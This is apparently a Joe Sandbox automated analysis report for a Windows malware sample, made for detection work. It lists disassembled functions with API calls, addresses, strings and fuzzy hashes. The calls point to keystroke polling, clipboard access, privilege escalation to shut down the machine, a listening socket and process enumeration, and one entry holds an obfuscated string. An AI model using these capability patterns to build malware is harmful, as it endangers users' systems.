                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                            • String ID:
                                            • API String ID: 1240663315-0
                                            • Opcode ID: 8d4923574af0446bd879df27de564af03cf5cd9a6aa89b7bde26a3c159ddb5f6
                                            • Instruction ID: 0f55d45e6c22db91df73ec41e7911d0f394fb1379eeb8869d7bfaa4bf865822e
                                            • Opcode Fuzzy Hash: 8d4923574af0446bd879df27de564af03cf5cd9a6aa89b7bde26a3c159ddb5f6
                                            • Instruction Fuzzy Hash: 69E15B71604200AFCB15DF28C995E6ABBE9FF88314F05856DF58ADB2A1DB30E905CB52
                                            Function 00842B37 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                            Download Yara Rule
                                            APIs
                                            • GetKeyboardState.USER32(?), ref: 00842B5F
                                            • GetAsyncKeyState.USER32(000000A0), ref: 00842BE0
                                            • GetKeyState.USER32(000000A0), ref: 00842BFB
                                            • GetAsyncKeyState.USER32(000000A1), ref: 00842C15
                                            • GetKeyState.USER32(000000A1), ref: 00842C2A
                                            • GetAsyncKeyState.USER32(00000011), ref: 00842C42
                                            • GetKeyState.USER32(00000011), ref: 00842C54
                                            • GetAsyncKeyState.USER32(00000012), ref: 00842C6C
                                            • GetKeyState.USER32(00000012), ref: 00842C7E
                                            • GetAsyncKeyState.USER32(0000005B), ref: 00842C96
                                            • GetKeyState.USER32(0000005B), ref: 00842CA8
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: State$Async$Keyboard
                                            • String ID:
                                            • API String ID: 541375521-0
                                            • Opcode ID: 4af6f66d278b5d0c897cfaa41cf315812d018301272cd5e5dbeed17b21184232
                                            • Instruction ID: 1912189799112208634445bc4c2c8bbc11ffa4003e4242778300a52467388a69
                                            • Opcode Fuzzy Hash: 4af6f66d278b5d0c897cfaa41cf315812d018301272cd5e5dbeed17b21184232
                                            • Instruction Fuzzy Hash: 3D41963450C7CD6DFF359B6488443A9BFA0FB21354F84409AE5C6D66C2DB949AC4C7A2
                                            Function 00856D07 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                            • String ID:
                                            • API String ID: 1737998785-0
                                            • Opcode ID: 18a5df6d78f35201c7859997a265d6b236b161d507d20529049ab3f7cf446531
                                            • Instruction ID: 741f470d0c072a5513f86be8e0af7ebae7b7b5b87b8835b899b22a683f872a4f
                                            • Opcode Fuzzy Hash: 18a5df6d78f35201c7859997a265d6b236b161d507d20529049ab3f7cf446531
                                            • Instruction Fuzzy Hash: BD219F313002149FDB01AF68DD49F6D77A9FF14711F008419F94ADB2A2EB75EC118B95
                                            Function 0085C18C Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 232COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 00839ABF: CLSIDFromProgID.OLE32 ref: 00839ADC
                                              • Part of subcall function 00839ABF: ProgIDFromCLSID.OLE32(?,00000000), ref: 00839AF7
                                              • Part of subcall function 00839ABF: lstrcmpiW.KERNEL32(?,00000000), ref: 00839B05
                                              • Part of subcall function 00839ABF: CoTaskMemFree.OLE32(00000000,?,00000000), ref: 00839B15
                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 0085C235
                                            • _memset.LIBCMT ref: 0085C242
                                            • _memset.LIBCMT ref: 0085C360
                                            • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000001), ref: 0085C38C
                                            • CoTaskMemFree.OLE32(?), ref: 0085C397
                                            Strings
                                            • NULL Pointer assignment, xrefs: 0085C3E5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                            • String ID: NULL Pointer assignment
                                            • API String ID: 1300414916-2785691316
                                            • Opcode ID: 272f655f066966e1588be9b176f2d745e5e347c5255297925d78fe12ba132e79
                                            • Instruction ID: 456069f0efab08c7e5f4f73168e5e1332032cdc1f4e049935c56a8f8c4280d24
                                            • Opcode Fuzzy Hash: 272f655f066966e1588be9b176f2d745e5e347c5255297925d78fe12ba132e79
                                            • Instruction Fuzzy Hash: 8A91F671D00218ABDB10DF94DC91EDEBBB9FF04750F10816AE915E7291EB709A45CFA1
                                            Function 008479D3 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0083B134: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083B180
                                              • Part of subcall function 0083B134: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083B1AD
                                              • Part of subcall function 0083B134: GetLastError.KERNEL32 ref: 0083B1BA
                                            • ExitWindowsEx.USER32(?,00000000), ref: 00847A0F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                            • String ID: $@$SeShutdownPrivilege
                                            • API String ID: 2234035333-194228
                                            • Opcode ID: 5a174e850f8a3536e3595943b89c80da2cfcf4235ec301b881fcde20ed790c5d
                                            • Instruction ID: ecaa839d5eeabf9f88217b03ccc63e367939daa49ef025a85a449e4ce60ffc81
                                            • Opcode Fuzzy Hash: 5a174e850f8a3536e3595943b89c80da2cfcf4235ec301b881fcde20ed790c5d
                                            • Instruction Fuzzy Hash: 0101A77165833D6AF728A668DC5ABBF775CFB00744F140425F953E21D2D7649E0082A1
                                            Function 00858C4F Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                            Download Yara Rule
                                            APIs
                                            • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00858CA8
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00858CB7
                                            • bind.WSOCK32(00000000,?,00000010), ref: 00858CD3
                                            • listen.WSOCK32(00000000,00000005), ref: 00858CE2
                                            • WSAGetLastError.WSOCK32(00000000), ref: 00858CFC
                                            • closesocket.WSOCK32(00000000,00000000), ref: 00858D10
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorLast$bindclosesocketlistensocket
                                            • String ID:
                                            • API String ID: 1279440585-0
                                            • Opcode ID: f170eb800d215283ac9cfde134ad44fa33c9d268cd8a217d598664094a018edf
                                            • Instruction ID: f567184f1069c7768e1f1c879af1de174bfcc3443b1aee8435e3030e5b5d62bb
                                            • Opcode Fuzzy Hash: f170eb800d215283ac9cfde134ad44fa33c9d268cd8a217d598664094a018edf
                                            • Instruction Fuzzy Hash: 67219A31600204EFCB10AF68CD85A6EB7A9FF48725F108159E956F73E2CB70AD458B62
                                            Function 00846532 Relevance: 9.1, APIs: 6, Instructions: 71processCOMMON
                                            Download Yara Rule
                                            APIs
                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00846554
                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 00846564
                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 00846583
                                            • __wsplitpath.LIBCMT ref: 008465A7
                                            • _wcscat.LIBCMT ref: 008465BA
                                            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 008465F9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32__wsplitpath_wcscat
                                            • String ID:
                                            • API String ID: 1605983538-0
                                            • Opcode ID: edebdcea9a98755feb19bf210ebadb722bde3aec5966967de61ddb52d246cbc2
                                            • Instruction ID: 94f8c98c9f5a50c485b5975d875c34aa933e4ddc4e6dca2b35e465198c9e9dc9
                                            • Opcode Fuzzy Hash: edebdcea9a98755feb19bf210ebadb722bde3aec5966967de61ddb52d246cbc2
                                            • Instruction Fuzzy Hash: C421627190021CABDB10ABA4DD89FEEB7BCFB49300F5004A5E505E7181EB759F85CB61
                                            Function 00809B60 Relevance: 8.6, Strings: 6, Instructions: 1055COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ERCP$VUUU$VUUU$VUUU$VUUU$aqg5cvv9aqg55vv9aqg52vv9aqg5fvv9aqg5fvv9aqg55vv9aqg55vv9aqg51vv9aqg5cvv9aqg58vv9aqg55vv9aqg5cvv9aqg50vv9aqg57vv9aqg5
                                            • API String ID: 0-2111023343
                                            • Opcode ID: 08a59ac289b607031b4c103841ecc4bec832c2cd9cce22d9fd2f3c3367d488d7
                                            • Instruction ID: 2c4a91300c36a2564b3ef8a133ab6a04c6c7c45aee7257ae856a8bc0df5ee523
                                            • Opcode Fuzzy Hash: 08a59ac289b607031b4c103841ecc4bec832c2cd9cce22d9fd2f3c3367d488d7
                                            • Instruction Fuzzy Hash: 69926C71E0021ACBDF68DF58C8807ADB7B1FF94314F2481AAE856EB285D7719D81CB91
                                            Function 0085923B Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0085A82C: inet_addr.WSOCK32(00000000,00000000,?,?,?,00000000), ref: 0085A84E
                                            • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00859296
                                            • WSAGetLastError.WSOCK32(00000000,00000000), ref: 008592B9
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorLastinet_addrsocket
                                            • String ID:
                                            • API String ID: 4170576061-0
                                            • Opcode ID: b6d771410bbc01493ecf87bd2ff3113ec7a11e7977c6ebd53239ef05c3401513
                                            • Instruction ID: 0815f6902cf5075f2967ac4796bfe524d71bf0b4fc2d5d08f3c8329c1278578b
                                            • Opcode Fuzzy Hash: b6d771410bbc01493ecf87bd2ff3113ec7a11e7977c6ebd53239ef05c3401513
                                            • Instruction Fuzzy Hash: BB41BF70600204AFDB10AB688C46EBE77EDFF44724F048548F996EB3D2DB749D418B92
                                            Function 0084EB60 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • FindFirstFileW.KERNEL32(?,?), ref: 0084EB8A
                                            • _wcscmp.LIBCMT ref: 0084EBBA
                                            • _wcscmp.LIBCMT ref: 0084EBCF
                                            • FindNextFileW.KERNEL32(00000000,?), ref: 0084EBE0
                                            • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0084EC0E
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Find$File_wcscmp$CloseFirstNext
                                            • String ID:
                                            • API String ID: 2387731787-0
                                            • Opcode ID: 42bb964f9e50b77de76872e9982e7d205b17d0f82d9418b3afc1c66262647962
                                            • Instruction ID: 3485818e8551073b8239849ce69bc4b8ed9bb056901249280f94f974869b2555
                                            • Opcode Fuzzy Hash: 42bb964f9e50b77de76872e9982e7d205b17d0f82d9418b3afc1c66262647962
                                            • Instruction Fuzzy Hash: F9418C356007069FCB08DF28C491E9AB7E8FF59324F10455DEA5ACB3A1DB31A984CF92
                                            Function 00868111 Relevance: 7.6, APIs: 5, Instructions: 69windowCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                            • String ID:
                                            • API String ID: 292994002-0
                                            • Opcode ID: 92d2404b2ffa7fc5e73580df1614001824a4f64e03052907ed01e5f696b4b340
                                            • Instruction ID: 413c860b287d6cca362f96552089bbc8e22836108b23f83ba4a786bda07e3d75
                                            • Opcode Fuzzy Hash: 92d2404b2ffa7fc5e73580df1614001824a4f64e03052907ed01e5f696b4b340
                                            • Instruction Fuzzy Hash: BE11EF31300225AFE7216F2ADC44E6FBB9DFF56320B020529F80DD7281CF70E84286A5
                                            Function 0081E01E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 15libraryloaderCOMMON
                                            Download Yara Rule
                                            APIs
                                            • LoadLibraryA.KERNEL32(kernel32.dll,?,0081E014,75570AE0,0081DEF1,0089DC38,?,?), ref: 0081E02C
                                            • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 0081E03E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: AddressLibraryLoadProc
                                            • String ID: GetNativeSystemInfo$kernel32.dll
                                            • API String ID: 2574300362-192647395
                                            • Opcode ID: ef196e8e479217695199cd4f4a118be23eda8d193631f2b875b8c5677a860be1
                                            • Instruction ID: dde16303b166669e5353216c0c7e77fabe48a26fb934c1b013413a288381e69d
                                            • Opcode Fuzzy Hash: ef196e8e479217695199cd4f4a118be23eda8d193631f2b875b8c5677a860be1
                                            • Instruction Fuzzy Hash: 61D0C774500B129FD7315F65EC0D696B7D8FF04711F188419E895D2790D7B8D8C08750
                                            Function 008413CA Relevance: 5.1, APIs: 1, Strings: 2, Instructions: 560stringCOMMON
                                            Download Yara Rule
                                            APIs
                                            • lstrlenW.KERNEL32(?,?,?,00000000), ref: 008413DC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: lstrlen
                                            • String ID: ($|
                                            • API String ID: 1659193697-1631851259
                                            • Opcode ID: 669e3937a1d55408cb4856d57be7add7da6818b110927c39f41ca22cf6913a93
                                            • Instruction ID: 0954a0d4d6914f5dca6f976ddab2e4ea3677ddd2bf915e66262d59e33f39c2a4
                                            • Opcode Fuzzy Hash: 669e3937a1d55408cb4856d57be7add7da6818b110927c39f41ca22cf6913a93
                                            • Instruction Fuzzy Hash: AB322875A007099FCB28CF69C4849AAB7F1FF48310B15C56EE59ADB3A1E770E981CB44
                                            Function 0081B11F Relevance: 4.9, APIs: 3, Instructions: 377COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081B34E: GetWindowLongW.USER32(?,000000EB), ref: 0081B35F
                                            • DefDlgProcW.USER32(?,?,?,?,?), ref: 0081B22F
                                              • Part of subcall function 0081B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 0081B5A5
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Proc$LongWindow
                                            • String ID:
                                            • API String ID: 2749884682-0
                                            • Opcode ID: afac727bf4bb37ac74945fc1bff749649ccc097f569293efa6cacafd76d97717
                                            • Instruction ID: 42fa861c39523caf8066e948c40bdf8e8e3aa1a0c152678b1aa89996a22e46d9
                                            • Opcode Fuzzy Hash: afac727bf4bb37ac74945fc1bff749649ccc097f569293efa6cacafd76d97717
                                            • Instruction Fuzzy Hash: 6BA1577011410DBADB28AB2D9C88EFF296CFF5B368B108119F50AD6296DB34DC85D273
                                            Function 00854EB5 Relevance: 4.7, APIs: 3, Instructions: 155networkfileCOMMON
                                            Download Yara Rule
                                            APIs
                                            • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,008543BF,00000000), ref: 00854FA6
                                            • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00854FD2
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: Internet$AvailableDataFileQueryRead
                                            • String ID:
                                            • API String ID: 599397726-0
                                            • Opcode ID: 87281b41892cbbd81089c93998dc075b35d308a2a98be9150c303a02b876c590
                                            • Instruction ID: 3e290a323e12b3819f1bf13ff5944404e94acbe8df9337693cd26bd0f4974500
                                            • Opcode Fuzzy Hash: 87281b41892cbbd81089c93998dc075b35d308a2a98be9150c303a02b876c590
                                            • Instruction Fuzzy Hash: 7D41E971504609BFEB209E88DC85EBF77BCFB4076EF10402AFA05E6181DA719E899660
                                            Function 0084E1FD Relevance: 4.6, APIs: 3, Instructions: 72COMMON
                                            Download Yara Rule
                                            APIs
                                            • SetErrorMode.KERNEL32(00000001), ref: 0084E20D
                                            • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0084E267
                                            • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0084E2B4
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.000000000088D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482294169.00000000008AE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482360556.00000000008BA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000000.00000002.1482381450.00000000008C4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_800000_s7Okni1gfE.jbxd
                                            Similarity
                                            • API ID: ErrorMode$DiskFreeSpace
                                            • String ID:
                                            • API String ID: 1682464887-0
                                            • Opcode ID: 3bf784caed0862510c30d8c4b4414cfdd713aa5064d3739feb14cff326e932a3
                                            • Instruction ID: bbea217bb2536a05b38c13fa822299956c1885040b187c38f97836862fb28798
                                            • Opcode Fuzzy Hash: 3bf784caed0862510c30d8c4b4414cfdd713aa5064d3739feb14cff326e932a3
                                            • Instruction Fuzzy Hash: BB215C35A00218EFCB00EFA9D885AADFBB8FF48314F0484A9E945E7291DB319915CB51
                                            Function 0083B134 Relevance: 4.6, APIs: 3, Instructions: 67COMMON
                                            Download Yara Rule
                                            APIs
                                              • Part of subcall function 0081F4EA: std::exception::exception.LIBCMT ref: 0081F51E
                                              • Part of subcall function 0081F4EA: __CxxThrowException@8.LIBCMT ref: 0081F533
                                            • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0083B180
                                            • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0083B1AD
                                            • GetLastError.KERNEL32 ref: 0083B1BA
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1482218643.0000000000801000.00000020.00000001.01000000.00000003.sdmp, Offset: 00800000, based on PE: true
                                            • Associated: 00000000.00000002.1482197900.0000000000800000.00000002.00000001.01000000.00000003.sdmpDownload File
